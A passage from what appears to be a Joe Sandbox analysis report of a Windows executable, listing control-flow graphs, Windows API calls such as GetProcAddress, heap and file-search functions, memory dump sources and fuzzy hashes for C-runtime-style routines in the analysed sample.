                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2744730728-0
                                                                    • Opcode ID: e76b35157acd5d77734543ada3b8650d109f5fd5828fcd7466ed1e6288bf2526
                                                                    • Instruction ID: 3253e057572cc8ea4428a5e3b1b2b65ed3a8a9834198452857cfc168740dd82c
                                                                    • Opcode Fuzzy Hash: e76b35157acd5d77734543ada3b8650d109f5fd5828fcd7466ed1e6288bf2526
                                                                    • Instruction Fuzzy Hash: A6018472900249EFDF15AFA0DC05FEE3BA9EF00365F004158F801961A1EBB9DE50DB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 117 bc00f-bc01b call bbff6 120 bc02d-bc039 call bbf74 ExitProcess 117->120 121 bc01d-bc027 GetCurrentProcess TerminateProcess 117->121 121->120
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000002,?,000BC0D1,000BD3C0,000BD3C0,?,00000002,D4CEDC35,000BD3C0,00000002), ref: 000BC020
                                                                    • TerminateProcess.KERNEL32(00000000,?,000BC0D1,000BD3C0,000BD3C0,?,00000002,D4CEDC35,000BD3C0,00000002), ref: 000BC027
                                                                    • ExitProcess.KERNEL32 ref: 000BC039
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 1ffa4394c3c81d7c662072c9257fd11a250074d5c97bb7fde78059533bd0c13c
                                                                    • Instruction ID: 9f9eab3692632623d3567696d3e4a415d8168c20773438645fe63b304676894e
                                                                    • Opcode Fuzzy Hash: 1ffa4394c3c81d7c662072c9257fd11a250074d5c97bb7fde78059533bd0c13c
                                                                    • Instruction Fuzzy Hash: 3ED06C31000289BBEB152FA1DC0DCED3F6AAB48351B148020B9094A032CF79EA96DA90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 124 bf752-bf757 125 bf759-bf771 124->125 126 bf77f-bf788 125->126 127 bf773-bf777 125->127 128 bf79a 126->128 129 bf78a-bf78d 126->129 127->126 130 bf779-bf77d 127->130 134 bf79c-bf7a9 GetStdHandle 128->134 132 bf78f-bf794 129->132 133 bf796-bf798 129->133 131 bf7f4-bf7f8 130->131 131->125 137 bf7fe-bf801 131->137 132->134 133->134 135 bf7ab-bf7ad 134->135 136 bf7d6-bf7e8 134->136 135->136 138 bf7af-bf7b8 GetFileType 135->138 136->131 139 bf7ea-bf7ed 136->139 138->136 140 bf7ba-bf7c3 138->140 139->131 141 bf7cb-bf7ce 140->141 142 bf7c5-bf7c9 140->142 141->131 143 bf7d0-bf7d4 141->143 142->131 143->131
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,000BF641,000CF088,0000000C), ref: 000BF79E
                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,000BF641,000CF088,0000000C), ref: 000BF7B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleType
                                                                    • String ID:
                                                                    • API String ID: 3000768030-0
                                                                    • Opcode ID: 82877abbf5f5a3aa634f01befb0f27bc36e3cfd492d705716bc4965a118a68c4
                                                                    • Instruction ID: 690a8632cc299feb5c5f0e525b0f59663444ed7782d0b615bc0a295f259d1113
                                                                    • Opcode Fuzzy Hash: 82877abbf5f5a3aa634f01befb0f27bc36e3cfd492d705716bc4965a118a68c4
                                                                    • Instruction Fuzzy Hash: B411B4715487834ADB708E3ECCC86B6BAD4AB56330B3807BAD4B6875F1CA74D886D241

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetLastError.KERNEL32(000CED20,0000000C), ref: 000BBE33
                                                                    • ExitThread.KERNEL32 ref: 000BBE3A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorExitLastThread
                                                                    • String ID:
                                                                    • API String ID: 1611280651-0
                                                                    • Opcode ID: 0cbfdd12f96039ccc23742b4792f44eedf159d29605d792bd406ca58eec78c8c
                                                                    • Instruction ID: 396fcb2cccc28574cc44521a348bfd31862101ed0c766d7e1f94807db3b2caec
                                                                    • Opcode Fuzzy Hash: 0cbfdd12f96039ccc23742b4792f44eedf159d29605d792bd406ca58eec78c8c
                                                                    • Instruction Fuzzy Hash: 68F04F71A40245AFEB04BBB0C80AFEE7B64EF40710F104559F515972A3DB78AA01CBA1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 164 c00eb-c00f4 165 c00f6-c0109 RtlFreeHeap 164->165 166 c0123-c0124 164->166 165->166 167 c010b-c0122 GetLastError call c07c0 call c0777 165->167 167->166
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,000C0C59,?,00000000,?,?,000C0B75,?,00000007,?,?,000C118E,?,?), ref: 000C0101
                                                                    • GetLastError.KERNEL32(?,?,000C0C59,?,00000000,?,?,000C0B75,?,00000007,?,?,000C118E,?,?), ref: 000C010C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    • Opcode ID: 19d32e5c7b955b3f75054d4134df8b638eb6334870208c1751d7dbe3259389f8
                                                                    • Instruction ID: 5ab8e9144d20a8338d0dcc1d42187296b9617b6dfb0303cfcf15cdbb7b576588
                                                                    • Opcode Fuzzy Hash: 19d32e5c7b955b3f75054d4134df8b638eb6334870208c1751d7dbe3259389f8
                                                                    • Instruction Fuzzy Hash: F7E08C32604284EBEB192BA4FC09FDD7B9CEB04791F040028FA0886062CB389940CBD5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 238 b6e20-b6ea5 call b2760 call b6f80 call b8130 call bbd06 246 b6eaa-b6eb7 238->246 247 b6ebe-b6ecc 246->247 248 b6ed2-b6edf 247->248 249 b6f44-b6f55 call b943d 247->249 252 b6f15-b6f2b 248->252 253 b6ee5-b6ef2 248->253 254 b6f5a-b6f72 call b81a0 call b9261 249->254 257 b6f75 252->257 259 b6ef8-b6f05 253->259 260 b6f30-b6f3f call b8150 253->260 257->247 259->254 265 b6f0b-b6f10 259->265 260->257 265->257
                                                                    APIs
                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000B6F55
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Cpp_errorThrow_std::_
                                                                    • String ID:
                                                                    • API String ID: 2134207285-0
                                                                    • Opcode ID: f04658a67787eca60452531120e44ed5748cde4ac7cc51f3eba6ce6b7ef79609
                                                                    • Instruction ID: faefa5f67290aa0a08ece583d05e65810b528f6e12dff3424728065662f89377
                                                                    • Opcode Fuzzy Hash: f04658a67787eca60452531120e44ed5748cde4ac7cc51f3eba6ce6b7ef79609
                                                                    • Instruction Fuzzy Hash: 9B31F6B0D0420ADFCB04DFA8D590AEEBBF4BF48300F50896AE465A7351DB399A04CF55

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 268 beebe-beee8 269 beeea-beeec 268->269 270 beeee-beef0 268->270 271 bef3f-bef42 269->271 272 beef2-beef4 270->272 273 beef6-beefd call bedf3 270->273 272->271 275 bef02-bef06 273->275 276 bef08-bef16 GetProcAddress 275->276 277 bef25-bef3c 275->277 276->277 278 bef18-bef23 call bbaf0 276->278 279 bef3e 277->279 278->279 279->271
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec0e9565df19aedcd6ae7517596cdeb95e090d820cf4e172ad3bcbebeda09ad4
                                                                    • Instruction ID: 4bd203632abec1eec3a3fa65ea51842419698bb9ad23103a11c37fa1786d3475
                                                                    • Opcode Fuzzy Hash: ec0e9565df19aedcd6ae7517596cdeb95e090d820cf4e172ad3bcbebeda09ad4
                                                                    • Instruction Fuzzy Hash: 5E01F5336102679FEB128F6CEC40AEB37A6FB84320B240125FD14CB159EB34D8009BE4

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CreateElliptic
                                                                    • String ID:
                                                                    • API String ID: 1611293138-0
                                                                    • Opcode ID: 6200eece84a01bcaa08ae289ab51d06465fc08ccd779369f5c4d672d766bf6eb
                                                                    • Instruction ID: 9563f4c6dda63c8fee8abf81bd8deff0d199584398898338f1ab130474909ebb
                                                                    • Opcode Fuzzy Hash: 6200eece84a01bcaa08ae289ab51d06465fc08ccd779369f5c4d672d766bf6eb
                                                                    • Instruction Fuzzy Hash: 1A11E5B4D003099BDB04EFA8C5557EEBBF1FF48304F40891AD855AB341EB78A604CB91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 291 c0c65-c0c71 292 c0ca3-c0cae call c0777 291->292 293 c0c73-c0c75 291->293 300 c0cb0-c0cb2 292->300 295 c0c8e-c0c9f RtlAllocateHeap 293->295 296 c0c77-c0c78 293->296 298 c0c7a-c0c81 call bd347 295->298 299 c0ca1 295->299 296->295 298->292 303 c0c83-c0c8c call bc227 298->303 299->300 303->292 303->295
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,-A3400188,?,000B9200,?,?,000B67E7,?,000B6199), ref: 000C0C97
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: bc15ef30a81f871f49db2110121c587180b56ffb25ad5142b127c91abec8a1bb
                                                                    • Instruction ID: 2c4455df72a0cd710b1212552fad3b1abcf41a72c070ab99dc9e3abe99526eb1
                                                                    • Opcode Fuzzy Hash: bc15ef30a81f871f49db2110121c587180b56ffb25ad5142b127c91abec8a1bb
                                                                    • Instruction Fuzzy Hash: 64E0E531209624EAE7212766EC51FDE7688DB417A0F140319BC509A0D1CB24CC00C5E4
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000B9CD6
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000B9CE4
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000B9CF5
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000B9D06
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000B9D17
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000B9D28
                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 000B9D39
                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000B9D4A
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 000B9D5B
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000B9D6C
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000B9D7D
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000B9D8E
                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000B9D9F
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000B9DB0
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000B9DC1
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000B9DD2
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000B9DE3
                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000B9DF4
                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 000B9E05
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 000B9E16
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 000B9E27
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000B9E38
                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 000B9E49
                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 000B9E5A
                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 000B9E6B
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000B9E7C
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000B9E8D
                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 000B9E9E
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000B9EAF
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000B9EC0
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 000B9ED1
                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000B9EE2
                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 000B9EF3
                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000B9F04
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 000B9F15
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 000B9F26
                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 000B9F37
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 000B9F48
                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 000B9F59
                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 000B9F6A
                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 000B9F7B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                    • API String ID: 667068680-295688737
                                                                    • Opcode ID: 8167c24c59a5484d09fbbcc16190b6714cd9aa6d9b7b9fc6ae51c54a54370ff7
                                                                    • Instruction ID: 296cfeae27023ef79d067957bbc4f5c537883f6e2cbabe7f44f5bc49c87619e9
                                                                    • Opcode Fuzzy Hash: 8167c24c59a5484d09fbbcc16190b6714cd9aa6d9b7b9fc6ae51c54a54370ff7
                                                                    • Instruction Fuzzy Hash: 5161EE71993390BBB704AFF5ED5AEDA3BA8AB0D702700052BB60197161DFBC51819B74
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a3a36fbd5591f6f3585eb42c35f6d6d98e3860656195e5ebb42e3dbc90d4c0f
                                                                    • Instruction ID: e13601c8c2b30161a85f0870b5aeaa15b11651159c73949357614ec2170e352d
                                                                    • Opcode Fuzzy Hash: 7a3a36fbd5591f6f3585eb42c35f6d6d98e3860656195e5ebb42e3dbc90d4c0f
                                                                    • Instruction Fuzzy Hash: 48F25966A546D45FEF024AB884B53DF6FF24B6B730F2A279986E41F2D3C587010A9B10
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !/>$EFde$EFde
                                                                    • API String ID: 0-183606976
                                                                    • Opcode ID: bfd213874cf5000bfdab0cc7aa7b58253e6864ebce970d660e41dfec99ab9995
                                                                    • Instruction ID: b9ace1cf971e4db6858556b0afc22b93fdcd59341c165506e08b17c89b4e0695
                                                                    • Opcode Fuzzy Hash: bfd213874cf5000bfdab0cc7aa7b58253e6864ebce970d660e41dfec99ab9995
                                                                    • Instruction Fuzzy Hash: 76A33572E219244BDB64CE79CC8179AB2F26F99330F5983E96639EB2D0D7705E418F40
                                                                    APIs
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 000C18EB
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 000C19DF
                                                                    • FindClose.KERNEL32(00000000), ref: 000C1A1E
                                                                    • FindClose.KERNEL32(00000000), ref: 000C1A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1164774033-0
                                                                    • Opcode ID: d785d00f9ae61adc1af9fc4849a6e5450c24565205ad66b234ad365f57540691
                                                                    • Instruction ID: c7c5c55388a25f9868c4f85c400390de60d89d7c2450a7d74ed55dfdb75b67b0
                                                                    • Opcode Fuzzy Hash: d785d00f9ae61adc1af9fc4849a6e5450c24565205ad66b234ad365f57540691
                                                                    • Instruction Fuzzy Hash: 3571C071D091699FDF64AF28DC99FEEBBB9EB06300F5441DDE049A3252DA308E858F50
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000BA470
                                                                    • IsDebuggerPresent.KERNEL32 ref: 000BA53C
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000BA55C
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 000BA566
                                                                    Memory Dump Source
